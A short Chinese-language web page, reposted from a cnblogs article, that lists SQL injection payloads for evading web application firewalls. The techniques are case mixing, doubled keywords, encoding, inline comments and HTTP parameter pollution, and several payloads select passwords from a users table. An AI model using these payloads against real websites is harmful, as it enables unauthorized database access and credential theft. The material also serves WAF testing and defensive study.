SQL注入过WAF思路-乐商网络

大小写
id=-1 uNIoN sELecT 1,2,3
双写
id=-1 UNIunionON SELselectECT 1,2,3
编码
id=1%252f%252a*/UNION%252f%252a /SELECT
id=1%D6‘%20AND%201=2%23 SELECT 'Ä'='A'; #1
十六进制
id=-1 /*!u%6eion*/ /*!se%6cect*/ 1,2,3 SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2f61))
注释&内联注释
id=-1 %55nION/**/%53ElecT 1,2,3
id=-1'union%a0select pass from users#
id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3
id=-1 %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3


http参数解析
/?id=1;select+1,2,3+from+users+where+id=1—
/?id=1;select+1&amp;id=2,3+from+users+where+id=1—
/?id=1/**/union/*&amp;id=*/select/*&amp;id=*/pwd/*&amp;id=*/from/*&amp;id=*/users

http参数分段
/?a=1+union/*&amp;b=*/select+1,pass/*&amp;c=*/from+users--
select * from table where a=1 union/* and b=*/select 1,pass/* limit */from users--

原文学习地址：https://www.cnblogs.com/Yang34/p/14139164.html

本站网络名称： 乐商网络

本站永久网址： https://ishoud.com

网站侵权说明：本网站的文章部分内容可能来源于网络，仅供大家学习与参考，如有侵权，请联系站长QQ810066660删除处理。
1 本站一切资源不代表本站立场，并不代表本站赞同其观点和对其真实性负责。
2 本站一律禁止以任何方式发布或转载任何违法的相关信息，访客发现请向站长举报
3 本站资源大多存储在云盘，如发现链接失效，请联系我们我们会第一时间更新。

THE END

网络安全
# id # select